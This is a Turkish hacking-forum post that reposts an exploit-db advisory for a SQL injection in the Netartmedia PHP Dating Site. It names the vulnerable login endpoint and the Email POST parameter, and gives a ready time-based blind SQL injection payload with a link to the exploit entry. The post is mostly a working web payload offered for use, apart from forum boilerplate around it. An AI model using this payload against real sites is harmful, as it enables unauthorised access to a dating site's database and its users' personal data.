İPUCU

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...

Seçenekler

Netartmedia Php Dating Site - SQL Injection

22-03-2019 11:17
#1
Kacamax - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2012
Nereden:
Sivas / 58
Yaş:
30
Mesajlar:
654
Teşekkür (Etti):
167
Teşekkür (Aldı):
66
Konular:
190
Ticaret:
(0) %
# Exploit Basligi / Exploit Title: Netartmedia Php Dating Site - SQL Injection
# Tarih / Date: 19.03.2019
# Exploit Yazar / Exploit Author: Ahmet Ümit BAYRAM
# Yapimci Adresi / Vendor Homepage: https://www.netartmedia.net/datingsite/
# Demo Adresi / Demo Site: https://www.phpscriptdemos.com/dating/
# Versiyon / Version: Lastest
# Test Edilen Sistem / Tested on: Kali Linux
# CVE: N/A
# Aciklama / Description: PHP ile Arkadaslik sistesi olusturmak icin hazirlanmis, gelismis bir sistemdir.


Exploit:
Kod:
 ----- PoC SQLi -----

Istek: http://localhost/[PATH]/loginaction.php
Parametre: Email (POST)
Payload: Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login
Exploit Adresi:
https://www.exploit-db.com/exploits/46576
Kullanıcı İmzası
“Bir soru sorulduğunda sorudan çok sana soruyu soranı tanımaya çalış”


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı